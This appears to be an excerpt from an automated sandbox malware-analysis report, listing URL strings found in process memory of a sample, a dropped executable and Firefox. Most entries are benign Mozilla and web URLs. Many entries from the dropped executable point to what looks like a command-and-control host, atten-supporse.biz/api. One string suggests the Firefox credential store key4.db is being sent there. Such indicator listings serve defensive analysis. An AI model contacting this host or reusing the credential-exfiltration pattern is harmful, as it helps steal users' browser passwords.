Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF658000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000021.00000003.2973921454.00000273AA039000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3050220597.000000947E5D8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2891656472.00000273AA03A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000021.00000002.3055190646.000002739919A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd-j
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: d985563cac.exe, 00000012.00000002.2940566596.0000000001459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.b
Source: d985563cac.exe, 00000012.00000002.2940566596.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2830517161.0000000001489000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2857965033.0000000005C0E000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2856965234.0000000005C0E000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000002.2940566596.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2970106725.0000000001480000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3135356272.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3060303366.0000000001480000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3079414270.00000000014A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/
Source: d985563cac.exe, 0000001E.00000003.2970106725.0000000001480000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2940878588.0000000001483000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/2
Source: d985563cac.exe, 00000012.00000002.2940566596.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/9
Source: d985563cac.exe, 0000001E.00000003.2970106725.0000000001480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/:
Source: d985563cac.exe, 0000001E.00000003.3135825805.0000000001425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/K/
Source: d985563cac.exe, 00000010.00000003.2974806394.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2831958191.0000000001333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/R_Z
Source: d985563cac.exe, 00000010.00000003.2998838447.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2832377914.0000000001338000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.3000556167.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3065632992.0000000001326000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2974806394.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2831958191.0000000001333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/YS
Source: d985563cac.exe, 00000010.00000003.2665848570.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2690163685.000000000132F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2770412899.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663222028.000000000132F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2688903323.000000000132F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664605570.0000000001333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/Z_b
Source: d985563cac.exe, 0000001E.00000003.3135825805.000000000141D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api
Source: d985563cac.exe, 00000012.00000002.2940566596.0000000001459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api-21
Source: d985563cac.exe, 00000012.00000002.2940566596.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api3
Source: d985563cac.exe, 00000010.00000003.2738907476.0000000001331000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/api9
Source: d985563cac.exe, 00000010.00000003.2688903323.000000000132F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiC
Source: d985563cac.exe, 0000001E.00000003.3135356272.00000000014A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiG
Source: d985563cac.exe, 00000012.00000003.2900581057.0000000001480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiIS
Source: d985563cac.exe, 0000001E.00000003.3135825805.000000000141D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apiP
Source: d985563cac.exe, 00000012.00000002.2940566596.0000000001459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apibch
Source: d985563cac.exe, 00000012.00000002.2940566596.0000000001459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apier
Source: d985563cac.exe, 00000010.00000003.2714140999.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2714429122.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2688903323.000000000132F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/apig
Source: d985563cac.exe, 00000010.00000003.2714140999.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2665848570.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2714429122.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2690163685.000000000132F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663222028.000000000132F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2688903323.000000000132F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664605570.0000000001333000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3058702288.000000000148F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3132584782.0000000001490000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2970106725.0000000001480000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2992964229.0000000001493000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2991550390.0000000001491000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2940878588.0000000001483000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/j
Source: d985563cac.exe, 00000010.00000003.2690163685.000000000132F000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2688903323.000000000132F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/r_
Source: d985563cac.exe, 00000010.00000003.2714140999.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2714429122.0000000001333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz/z_B
Source: d985563cac.exe, 00000012.00000002.2940566596.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3135825805.0000000001405000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/api
Source: d985563cac.exe, 0000001E.00000003.3135825805.0000000001405000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/api.default-release/key4.dbPK
Source: d985563cac.exe, 00000012.00000002.2940566596.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/apiH
Source: d985563cac.exe, 00000012.00000002.2940566596.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.biz:443/apis
Source: d985563cac.exe, 00000012.00000002.2940566596.0000000001459000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atten-supporse.bm
Source: firefox.exe, 00000021.00000002.3171312999.00000273A7D03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000021.00000002.3052932070.0000027397811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2977075827.00000273A9BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000002.2124046353.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2130097033.000000000B602000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2738907476.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2835086612.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2947618352.0000000005C01000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3063668397.00000273A31AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3029399801.000001F80C0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.2124046353.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2130097033.000000000B602000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2835086612.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3063668397.00000273A31AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3029399801.000001F80C0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3159160794.00000273A7A03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180chrome://browser/locale/safebrowsing/safebrowsin
Source: firefox.exe, 00000021.00000002.3052932070.00000273978D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000021.00000002.3052932070.00000273978D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: file.exe, 00000000.00000003.1880904083.0000000000674000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664643426.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663356184.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778836201.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778700447.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2876075382.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2875457709.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1880904083.0000000000674000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664643426.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663356184.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778836201.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778700447.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2876075382.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2875457709.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1880904083.0000000000674000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2664643426.0000000005C18000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2663356184.0000000005C2F000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778836201.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2778700447.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2876075382.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2875457709.0000000005C4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2827663613.00000273A7577000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3105017765.00000273A6C70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3144749087.00000273A7803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000002.2124046353.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2130097033.000000000B602000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2738907476.0000000001331000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2835086612.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2947618352.0000000005C01000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3063668397.00000273A31AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3029399801.000001F80C0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.2124046353.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2130097033.000000000B602000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2835086612.0000000005C0D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3063668397.00000273A31AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3029399801.000001F80C0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000021.00000003.2973921454.00000273AA039000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970660238.00000273AB1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000021.00000002.3052932070.0000027397830000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3052932070.0000027397811000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000021.00000003.2904150140.00000273A8A23000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2910210529.00000273A8A1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3000439742.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2964616454.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3014908538.00000273A8A1E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2948224150.00000273A8A21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
